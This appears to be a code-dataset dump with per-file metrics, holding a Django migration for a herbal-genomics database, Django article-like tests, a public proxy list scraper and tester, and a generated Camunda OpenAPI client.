| 0.103746
| 0.061297
| 0.029619
| 0.938993
| 0.913862
| 0.889866
| 0.884956
| 0.876983
| 0.868958
| 0
| 0.127543
| 0.278904
| 63,814
| 1,815
| 109
| 35.159229
| 0.695671
| 0.014683
| 0
| 0.788197
| 0
| 0
| 0.131943
| 0
| 0
| 0
| 0
| 0
| 0.210186
| 1
| 0.041229
| false
| 0
| 0.004042
| 0
| 0.049313
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f3394ab945bb44bf29b7f0311a195be2c507b7
| 10,966
|
py
|
Python
|
data/migrations/0002_auto_20211221_2104.py
|
neversay4ever/herb
|
2309129607b3b09428d3930af5f3f5a76c4689e1
|
[
"MIT"
] | null | null | null |
data/migrations/0002_auto_20211221_2104.py
|
neversay4ever/herb
|
2309129607b3b09428d3930af5f3f5a76c4689e1
|
[
"MIT"
] | null | null | null |
data/migrations/0002_auto_20211221_2104.py
|
neversay4ever/herb
|
2309129607b3b09428d3930af5f3f5a76c4689e1
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.10 on 2021-12-21 13:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='assembly',
name='gene_id',
field=models.CharField(max_length=250, verbose_name='基因ID'),
),
migrations.AlterField(
model_name='assembly',
name='gene_length',
field=models.CharField(max_length=250, verbose_name='基因长度'),
),
migrations.AlterField(
model_name='assembly',
name='herb_id',
field=models.CharField(max_length=250, verbose_name='药物编码'),
),
migrations.AlterField(
model_name='assembly',
name='tissue_id',
field=models.CharField(max_length=250, verbose_name='样本组织编码'),
),
migrations.AlterField(
model_name='cog',
name='cog_id',
field=models.CharField(max_length=250, verbose_name='COG ID'),
),
migrations.AlterField(
model_name='cog',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='cpc',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='cpc',
name='label',
field=models.CharField(max_length=250, verbose_name='标签'),
),
migrations.AlterField(
model_name='go',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='go',
name='go_id',
field=models.CharField(max_length=250, verbose_name='GO ID'),
),
migrations.AlterField(
model_name='go',
name='go_ontology',
field=models.CharField(max_length=250, verbose_name='GO 本体'),
),
migrations.AlterField(
model_name='go',
name='go_term',
field=models.CharField(max_length=250, verbose_name='GO 术语'),
),
migrations.AlterField(
model_name='kegg',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='kegg',
name='kegg_id',
field=models.CharField(max_length=250, verbose_name='KEGG ID'),
),
migrations.AlterField(
model_name='kog',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='kog',
name='kog_id',
field=models.CharField(max_length=250, verbose_name='KOG ID'),
),
migrations.AlterField(
model_name='nr',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='nr',
name='nr_id',
field=models.CharField(max_length=250, verbose_name='NR ID'),
),
migrations.AlterField(
model_name='pfam',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='pfam',
name='pfam_id',
field=models.CharField(max_length=250, verbose_name='Pfam ID'),
),
migrations.AlterField(
model_name='sample',
name='barcode_id',
field=models.CharField(max_length=250, verbose_name='条形码ID'),
),
migrations.AlterField(
model_name='sample',
name='chip_id',
field=models.CharField(max_length=250, verbose_name='芯片ID'),
),
migrations.AlterField(
model_name='sample',
name='collection_location',
field=models.CharField(max_length=250, verbose_name='采样地点'),
),
migrations.AlterField(
model_name='sample',
name='collection_tissue',
field=models.CharField(max_length=250, verbose_name='采样组织'),
),
migrations.AlterField(
model_name='sample',
name='collection_tissue_detail',
field=models.CharField(max_length=250, verbose_name='采样组织细节'),
),
migrations.AlterField(
model_name='sample',
name='collector',
field=models.CharField(max_length=250, verbose_name='采样人'),
),
migrations.AlterField(
model_name='sample',
name='field_store_condition',
field=models.CharField(max_length=250, verbose_name='野外保存条件'),
),
migrations.AlterField(
model_name='sample',
name='field_store_duration',
field=models.CharField(max_length=250, verbose_name='野外保存时间'),
),
migrations.AlterField(
model_name='sample',
name='herb_id',
field=models.CharField(max_length=250, verbose_name='药物编码'),
),
migrations.AlterField(
model_name='sample',
name='herb_name',
field=models.CharField(max_length=250, verbose_name='药物名称'),
),
migrations.AlterField(
model_name='sample',
name='herb_name_note',
field=models.CharField(max_length=250, verbose_name='药物名称注释'),
),
migrations.AlterField(
model_name='sample',
name='lane_id',
field=models.CharField(max_length=250, verbose_name='Lane ID'),
),
migrations.AlterField(
model_name='sample',
name='receiver',
field=models.CharField(max_length=250, verbose_name='样本接收人'),
),
migrations.AlterField(
model_name='sample',
name='sample_pic_name',
field=models.CharField(max_length=250, verbose_name='样本照片名称'),
),
migrations.AlterField(
model_name='sample',
name='seq_id',
field=models.CharField(max_length=250, verbose_name='测序编号'),
),
migrations.AlterField(
model_name='sample',
name='sequencing_length_type',
field=models.CharField(max_length=250, verbose_name='测序长度类型'),
),
migrations.AlterField(
model_name='sample',
name='sequencing_platform',
field=models.CharField(max_length=250, verbose_name='测序平台'),
),
migrations.AlterField(
model_name='sample',
name='sequencing_sample_id',
field=models.CharField(max_length=250, verbose_name='测序样本ID'),
),
migrations.AlterField(
model_name='sample',
name='temporary_store_condition',
field=models.CharField(max_length=250, verbose_name='临时保存条件'),
),
migrations.AlterField(
model_name='sample',
name='tissue_id',
field=models.CharField(max_length=250, verbose_name='组织编号'),
),
migrations.AlterField(
model_name='sample',
name='transport_store_condition',
field=models.CharField(max_length=250, verbose_name='运输保存条件'),
),
migrations.AlterField(
model_name='species',
name='guijing',
field=models.CharField(max_length=250, verbose_name='药-归经'),
),
migrations.AlterField(
model_name='species',
name='herb_name',
field=models.CharField(max_length=250, verbose_name='药物名称'),
),
migrations.AlterField(
model_name='species',
name='herb_pinyin',
field=models.CharField(max_length=250, verbose_name='药物拼音'),
),
migrations.AlterField(
model_name='species',
name='nature',
field=models.CharField(max_length=250, verbose_name='药-性'),
),
migrations.AlterField(
model_name='species',
name='origin',
field=models.CharField(max_length=250, verbose_name='地源'),
),
migrations.AlterField(
model_name='species',
name='palnt_class',
field=models.CharField(max_length=250, verbose_name='分类纲'),
),
migrations.AlterField(
model_name='species',
name='plant_family',
field=models.CharField(max_length=250, verbose_name='分类科'),
),
migrations.AlterField(
model_name='species',
name='plant_genus',
field=models.CharField(max_length=250, verbose_name='分类属'),
),
migrations.AlterField(
model_name='species',
name='plant_name',
field=models.CharField(max_length=250, verbose_name='植物名称'),
),
migrations.AlterField(
model_name='species',
name='plant_order',
field=models.CharField(max_length=250, verbose_name='分类目'),
),
migrations.AlterField(
model_name='species',
name='plant_species',
field=models.CharField(max_length=250, verbose_name='分类种'),
),
migrations.AlterField(
model_name='species',
name='species_suffix',
field=models.CharField(max_length=250, verbose_name='种后缀'),
),
migrations.AlterField(
model_name='species',
name='taste',
field=models.CharField(max_length=250, verbose_name='药-味'),
),
migrations.AlterField(
model_name='species',
name='tissue',
field=models.CharField(max_length=250, verbose_name='用药组织'),
),
migrations.AlterField(
model_name='species',
name='toxin',
field=models.CharField(max_length=250, verbose_name='药-毒'),
),
migrations.AlterField(
model_name='ssr',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='ssr',
name='ssr_type',
field=models.CharField(max_length=250, verbose_name='SSR类型'),
),
migrations.AlterField(
model_name='swissprot',
name='gene',
field=models.CharField(max_length=250, verbose_name='基因名称'),
),
migrations.AlterField(
model_name='swissprot',
name='swissprot_id',
field=models.CharField(max_length=250, verbose_name='SwissProt ID'),
),
]
| 34.923567
| 80
| 0.553711
| 1,052
| 10,966
| 5.551331
| 0.119772
| 0.205479
| 0.256849
| 0.297945
| 0.903596
| 0.901884
| 0.727226
| 0.596918
| 0.433904
| 0.23887
| 0
| 0.026947
| 0.323181
| 10,966
| 313
| 81
| 35.035144
| 0.759903
| 0.004195
| 0
| 0.677524
| 1
| 0
| 0.111925
| 0.010716
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003257
| 0
| 0.013029
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
968cb4959cdd188d5c9e75379e7587eb339a99c5
| 76
|
py
|
Python
|
pyvi/modes/__init__.py
|
Julian/PyVi
|
5e9e087146e0baffbe791bacccbfd4b840cdeb5f
|
[
"MIT"
] | 3
|
2018-07-26T09:52:31.000Z
|
2019-07-02T14:29:31.000Z
|
pyvi/modes/__init__.py
|
Julian/PyVi
|
5e9e087146e0baffbe791bacccbfd4b840cdeb5f
|
[
"MIT"
] | null | null | null |
pyvi/modes/__init__.py
|
Julian/PyVi
|
5e9e087146e0baffbe791bacccbfd4b840cdeb5f
|
[
"MIT"
] | null | null | null |
from pyvi.modes._insert import insert
from pyvi.modes._normal import normal
| 25.333333
| 37
| 0.842105
| 12
| 76
| 5.166667
| 0.5
| 0.258065
| 0.419355
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 38
| 38
| 0.911765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73a8423f3cd7762e10e4b23bc84ca3973db17257
| 7,761
|
py
|
Python
|
authors/apps/articles/tests/test_like_articles.py
|
andela/Ah-backend-valkyrie
|
f0eb64c27e1fe37d5c81e4b9a8762dcf3c336a79
|
[
"BSD-3-Clause"
] | null | null | null |
authors/apps/articles/tests/test_like_articles.py
|
andela/Ah-backend-valkyrie
|
f0eb64c27e1fe37d5c81e4b9a8762dcf3c336a79
|
[
"BSD-3-Clause"
] | 46
|
2019-01-08T13:16:41.000Z
|
2021-04-30T20:47:08.000Z
|
authors/apps/articles/tests/test_like_articles.py
|
andela/Ah-backend-valkyrie
|
f0eb64c27e1fe37d5c81e4b9a8762dcf3c336a79
|
[
"BSD-3-Clause"
] | 3
|
2019-01-07T08:21:59.000Z
|
2019-09-20T06:43:18.000Z
|
import json
from rest_framework.reverse import reverse
from rest_framework import status
from authors.apps.authentication.tests.base import BaseTestMethods
from authors.apps.articles.models import Article, LikeArticle
from authors.apps.authentication.models import User
class TestLikeArticle(BaseTestMethods):
def test_like_article(self):
"""Tests that an article has been liked successfuly"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
data = {
'slug': response.data.get('slug')
}
like_url = reverse('articles:like-article', kwargs=data)
res = self.client.post(like_url)
self.assertTrue(res.data.get('like'), True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_unlike_article(self):
"""Tests that a like is removed from an article"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
data = {
'slug': response.data.get('slug')
}
like_url = reverse('articles:like-article', kwargs=data)
self.client.post(like_url)
# Like same article a second time
res = self.client.post(like_url)
self.assertTrue(res.data.get('like'), True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_unlike_article(self):
"""Tests that a like is removed from an article"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
data = {
'slug': response.data.get('slug')
}
like_url = reverse('articles:like-article', kwargs=data)
self.client.post(like_url)
# Like same article a second time
res = self.client.post(like_url)
self.assertTrue(res.data.get('like'), True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_dislike_article(self):
"""Tests that an article has been disliked successfuly"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
data = {
'slug': response.data.get('slug')
}
like_url = reverse('articles:dislike-article', kwargs=data)
res = self.client.post(like_url)
self.assertFalse(res.data.get('like'), False)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_un_dislike_article(self):
"""Tests that a dislike is removed from an article"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
data = {
'slug': response.data.get('slug')
}
like_url = reverse('articles:dislike-article', kwargs=data)
self.client.post(like_url)
# Dislike same article a second time
res = self.client.post(like_url, data=data, format='json')
self.assertFalse(res.data.get('like'), False)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_get_likes(self):
"""
Tests that likes for a particular article are
fetched from the database
"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
data = {
'slug': response.data.get('slug')
}
like_url = reverse('articles:like-article', kwargs=data)
self.client.post(like_url)
article = self.like_helper_class.get_article_by_slug(
model=Article,
slug=response.data.get('slug')
)
likes = self.like_helper_class.get_likes_or_dislike(
model=LikeArticle,
like=True,
article_id=article.id
)
self.assertEqual(likes.get('count'), 1)
def test_get_dislikes(self):
"""
Tests that likes for a particular article are
fetched from the database
"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
data = {
'slug': response.data.get('slug')
}
like_url = reverse('articles:dislike-article', kwargs=data)
self.client.post(like_url)
article = self.like_helper_class.get_article_by_slug(
model=Article,
slug=response.data.get('slug')
)
likes = self.like_helper_class.get_likes_or_dislike(
model=LikeArticle,
like=False,
article_id=article.id
)
self.assertEqual(likes.get('count'), 1)
def test_like_article_with_invalid_slug(self):
"""
Tests that like article fails for a slug that
does not exists
"""
user = self.register_and_loginUser()
data = {
'slug': 'this-does-not-exist'
}
like_url = reverse('articles:like-article', kwargs=data)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(like_url)
self.assertTrue(
response.data.get('detail'),
'Article with slug \'this-does-not-exist\' was not found'
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_dislike_article_with_invalid_slug(self):
"""
Tests that dislike article fails for a slug that
does not exists
"""
user = self.register_and_loginUser()
data = {
'slug': 'this-does-not-exist'
}
like_url = reverse('articles:dislike-article', kwargs=data)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(like_url)
self.assertTrue(
response.data.get('detail'),
'Article with slug \'this-does-not-exist\' was not found'
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_get_article_by_slug(self):
"""
Tests that an article can be retrieved using a slug
"""
user = self.register_and_loginUser()
url = reverse(self.get_post_article_url)
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
response = self.client.post(url, data=self.article, format='json')
article = self.like_helper_class.get_article_by_slug(
model=Article,
slug=response.data.get('slug')
)
self.assertEqual(type(article), Article)
| 38.231527
| 74
| 0.622085
| 931
| 7,761
| 5.01826
| 0.105263
| 0.064212
| 0.059932
| 0.046233
| 0.903896
| 0.891695
| 0.891695
| 0.876712
| 0.861301
| 0.861301
| 0
| 0.004028
| 0.26427
| 7,761
| 202
| 75
| 38.420792
| 0.814186
| 0.085556
| 0
| 0.775641
| 0
| 0
| 0.083646
| 0.029038
| 0
| 0
| 0
| 0
| 0.108974
| 1
| 0.064103
| false
| 0
| 0.038462
| 0
| 0.108974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73d2c95d062fcbf3cbf16ee2dec442430b6bb168
| 11,819
|
py
|
Python
|
proxyscraper.py
|
ErsterImChat/Proxy-Scraper
|
73a76cb3dae325530299e5ce0d3a5e9f607c35c3
|
[
"Unlicense"
] | 1
|
2021-09-23T17:57:12.000Z
|
2021-09-23T17:57:12.000Z
|
proxyscraper.py
|
ErsterImChat/Proxy-Scraper
|
73a76cb3dae325530299e5ce0d3a5e9f607c35c3
|
[
"Unlicense"
] | null | null | null |
proxyscraper.py
|
ErsterImChat/Proxy-Scraper
|
73a76cb3dae325530299e5ce0d3a5e9f607c35c3
|
[
"Unlicense"
] | null | null | null |
import json
import os
import requests
import time
scrapeortest = input("Scrape, Test or both? (1, 2 or 3) ")
if scrapeortest == str(1):
# Executing Status Request
ProxyStatus = requests.get("https://api.proxyscrape.com/v2/?request=proxyinfo&simplified=true")
OnlyPS = input("Do you want to use all Proxie Sources? (else only ProxieScrape) (yes/no): \n")
# Setting Up Proxie Counter
proxystatusfile = open("proxiecountall.json", "w")
proxystatusfile.write(ProxyStatus.text)
proxystatusfile.close()
with open("proxiecountall.json") as file:
ProxyStatus = json.load(file)
# Printing Proxy Counter
print(str(ProxyStatus["proxy_count"]) + " Proxies are avalible from ProxieScrape, other Sources cant be counted before scraping.\n")
# Removing Proxie Counter File
if os.path.exists("proxiecountall.json"):
os.remove("proxiecountall.json")
# Getting Values for Request
HTTPS = ("yes")
TYPE = input("Which Type?: http,socks4,socks5,all: \n")
if TYPE == ("http"):
HTTPS = input("Should the Proxys support https? (yes/no): \n")
if HTTPS == ("yes"):
SSL = ("all")
else:
SSL = ""
TIMEOUT = input("Which Timeout?: \n")
# Executing API Request (ProxyScrape)
ProxyAPI = requests.get("https://api.proxyscrape.com/v2/?request=displayproxies&protocol=" + TYPE + "&timeout=" + TIMEOUT + "&country=all&ssl=+" + SSL + "&anonymity=all")
print(ProxyAPI.text)
# Writing ProxyScrape-Proxies to File
outfile = open("proxies_list.txt", "w")
outfile.write(ProxyAPI.text)
outfile.close()
# Executing API Request (openproxylist.xyz)
if TYPE == ("all"):
ProxyAPI2 = requests.get("https://api.openproxylist.xyz/http.txt")
print(ProxyAPI2.text)
else:
ProxyAPI2 = requests.get("https://api.openproxylist.xyz/" + TYPE + ".txt")
print(ProxyAPI2.text)
outfile = open("proxies_list.txt", "a")
outfile.write(ProxyAPI2.text)
outfile.close()
# Deleting Empty Lines in File
output = ""
with open("proxies_list.txt") as f:
for line in f:
if not line.isspace():
output += line
f = open("proxies_list.txt", "w")
f.write(output)
f.close()
#Counting Lines in File
num_lines = sum (1 for line in open('proxies_list.txt'))
print(str(num_lines) + " Proxies have been saved to proxies_list.txt\n")
input("Press Enter to close")
if scrapeortest == str(2):
print("Credits to sonerb for creating the Proxy-Tester")
time.sleep(2)
import math
import os
import os.path
import requests
from threading import Thread
import sys
import time
timeout = 5
good_list = []
def verify_list(proxy_list, thread_number):
global good_list, timeout
working_list = []
for prox in proxy_list:
try:
proxy_dict = {
"http": "http://" + prox + "/",
}
r = requests.get("http://ipinfo.io/json", proxies=proxy_dict, timeout=timeout)
site_code = r.json()
ip = site_code['ip']
#print('[Thread:', thread_number, '] Current IP:', ip)
print('[Thread:', thread_number, '] Proxy works:', prox)
#print('[Thread:', thread_number, '] match:', True if ip == prox.split(':')[0] else False)
working_list.append(prox)
except Exception as e:
placeholder = 1
#print('[Thread:', thread_number, '] Proxy failed', prox)
#print('[Thread:', thread_number, '] Proxy failed', e)
print('[Thread:', thread_number, '] Working Proxies:', working_list)
good_list += working_list
def get_proxy_list():
directory = './'
file = os.path.abspath(__file__)
for i in sorted(range(len(file)), reverse=True):
if '/' in file[i] or '\\' in file[i]:
directory = file[:i + 1]
break
file_list = os.listdir(directory)
proxy_list = []
for file in file_list:
if len(file) > 12:
if file[:8] == 'proxies_':
proxy_list.append(directory + file)
return proxy_list
def get_proxies(files):
proxy_list = []
for file in files:
for prox in open(file, 'r+').readlines():
proxy_list.append(prox.strip())
return proxy_list
def setup(number_threads):
thread_amount = float(number_threads)
proxy_list = get_proxies(get_proxy_list())
amount = int(math.ceil(len(proxy_list) / thread_amount))
proxy_lists = [proxy_list[x:x + amount] for x in range(0, len(proxy_list), amount)]
if len(proxy_list) % thread_amount > 0.0:
proxy_lists[len(proxy_lists) - 1].append(proxy_list[len(proxy_list) - 1])
return proxy_lists
def start(threads):
start_time = time.time()
lists = setup(threads)
thread_list = []
count = 0
for l in lists:
thread_list.append(Thread(target=verify_list, args=(l, count)))
thread_list[len(thread_list) - 1].start()
count += 1
for x in thread_list:
x.join()
print('[All ] Working Proxies:', good_list)
f = open('working_proxies_list.txt', 'w+')
to_write = ''
for i in good_list:
to_write += i + '\n'
f.write(to_write)
f.close()
stop_time = time.time()
print('[{0:.2f} seconds]'.format(stop_time - start_time))
if __name__ == "__main__":
if len(sys.argv) > 1:
start(sys.argv[1])
else:
start(100)
if scrapeortest == str(3):
# Executing Status Request
ProxyStatus = requests.get("https://api.proxyscrape.com/v2/?request=proxyinfo&simplified=true")
OnlyPS = input("Do you want to use all Proxie Sources? (else only ProxieScrape) (yes/no): \n")
# Setting Up Proxie Counter
proxystatusfile = open("proxiecountall.json", "w")
proxystatusfile.write(ProxyStatus.text)
proxystatusfile.close()
with open("proxiecountall.json") as file:
ProxyStatus = json.load(file)
# Printing Proxy Counter
print(str(ProxyStatus["proxy_count"]) + " Proxies are avalible from ProxieScrape, other Sources cant be counted before scraping.\n")
# Removing Proxie Counter File
if os.path.exists("proxiecountall.json"):
os.remove("proxiecountall.json")
# Getting Values for Request
HTTPS = ("yes")
TYPE = input("Which Type?: http,socks4,socks5,all: \n")
if TYPE == ("http"):
HTTPS = input("Should the Proxys support https? (yes/no): \n")
if HTTPS == ("yes"):
SSL = ("all")
else:
SSL = ""
TIMEOUT = input("Which Timeout?: \n")
# Executing API Request (ProxyScrape)
ProxyAPI = requests.get("https://api.proxyscrape.com/v2/?request=displayproxies&protocol=" + TYPE + "&timeout=" + TIMEOUT + "&country=all&ssl=+" + SSL + "&anonymity=all")
print(ProxyAPI.text)
# Writing ProxyScrape-Proxies to File
outfile = open("proxies_list.txt", "w")
outfile.write(ProxyAPI.text)
outfile.close()
# Executing API Request (openproxylist.xyz)
if TYPE == ("all"):
ProxyAPI2 = requests.get("https://api.openproxylist.xyz/http.txt")
print(ProxyAPI2.text)
else:
ProxyAPI2 = requests.get("https://api.openproxylist.xyz/" + TYPE + ".txt")
print(ProxyAPI2.text)
outfile = open("proxies_list.txt", "a")
outfile.write(ProxyAPI2.text)
outfile.close()
# Deleting Empty Lines in File
output = ""
with open("proxies_list.txt") as f:
for line in f:
if not line.isspace():
output += line
f = open("proxies_list.txt", "w")
f.write(output)
f.close()
#Counting Lines in File
num_lines = sum (1 for line in open('proxies_list.txt'))
print(str(num_lines) + " Proxies have been saved to proxies_list.txt\nNow they are getting tested.")
print("Credits to sonerb for creating the Proxy-Tester")
time.sleep(2)
import math
import os
import os.path
import requests
from threading import Thread
import sys
import time
timeout = 5
good_list = []
def verify_list(proxy_list, thread_number):
global good_list, timeout
working_list = []
for prox in proxy_list:
try:
proxy_dict = {
"http": "http://" + prox + "/",
}
r = requests.get("http://ipinfo.io/json", proxies=proxy_dict, timeout=timeout)
site_code = r.json()
ip = site_code['ip']
#print('[Thread:', thread_number, '] Current IP:', ip)
print('[Thread:', thread_number, '] Proxy works:', prox)
#print('[Thread:', thread_number, '] match:', True if ip == prox.split(':')[0] else False)
working_list.append(prox)
except Exception as e:
placeholder = 1
print('[Thread:', thread_number, '] Working Proxies:', working_list)
good_list += working_list
def get_proxy_list():
directory = './'
file = os.path.abspath(__file__)
for i in sorted(range(len(file)), reverse=True):
if '/' in file[i] or '\\' in file[i]:
directory = file[:i + 1]
break
file_list = os.listdir(directory)
proxy_list = []
for file in file_list:
if len(file) > 12:
if file[:8] == 'proxies_':
proxy_list.append(directory + file)
return proxy_list
def get_proxies(files):
proxy_list = []
for file in files:
for prox in open(file, 'r+').readlines():
proxy_list.append(prox.strip())
return proxy_list
def setup(number_threads):
thread_amount = float(number_threads)
proxy_list = get_proxies(get_proxy_list())
amount = int(math.ceil(len(proxy_list) / thread_amount))
proxy_lists = [proxy_list[x:x + amount] for x in range(0, len(proxy_list), amount)]
if len(proxy_list) % thread_amount > 0.0:
proxy_lists[len(proxy_lists) - 1].append(proxy_list[len(proxy_list) - 1])
return proxy_lists
def start(threads):
start_time = time.time()
lists = setup(threads)
thread_list = []
count = 0
for l in lists:
thread_list.append(Thread(target=verify_list, args=(l, count)))
thread_list[len(thread_list) - 1].start()
count += 1
for x in thread_list:
x.join()
print('[All ] Working Proxies:', good_list)
f = open('working_proxies_list.txt', 'w+')
to_write = ''
for i in good_list:
to_write += i + '\n'
f.write(to_write)
f.close()
stop_time = time.time()
print('[{0:.2f} seconds]'.format(stop_time - start_time))
if __name__ == "__main__":
if len(sys.argv) > 1:
start(sys.argv[1])
else:
start(100)
else:
print("I said 1, 2 or 3... Try better next Time!")
| 29.400498
| 175
| 0.557408
| 1,385
| 11,819
| 4.628159
| 0.143682
| 0.047738
| 0.030577
| 0.028081
| 0.965991
| 0.965367
| 0.958346
| 0.958346
| 0.958346
| 0.958346
| 0
| 0.009296
| 0.31737
| 11,819
| 401
| 176
| 29.473815
| 0.785201
| 0.083087
| 0
| 0.957529
| 0
| 0.007722
| 0.198386
| 0.011048
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03861
| false
| 0
| 0.069498
| 0
| 0.131274
| 0.081081
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb6d50e9a81c14ff9526a67855d2a7eab876019c
| 50,129
|
py
|
Python
|
openapi-python-client/openapi_client/api/task_variable_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_variable_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_variable_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Camunda BPM REST API
OpenApi Spec for Camunda BPM REST API. # noqa: E501
The version of the OpenAPI document: 7.13.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class TaskVariableApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_task_variable(self, id, var_name, **kwargs): # noqa: E501
"""delete_task_variable # noqa: E501
Removes a variable that is visible to a task. A variable is visible to a task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_variable(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to delete the variable from. (required)
:param str var_name: The name of the variable to be removed. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_task_variable_with_http_info(id, var_name, **kwargs) # noqa: E501
def delete_task_variable_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""delete_task_variable # noqa: E501
Removes a variable that is visible to a task. A variable is visible to a task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_variable_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to delete the variable from. (required)
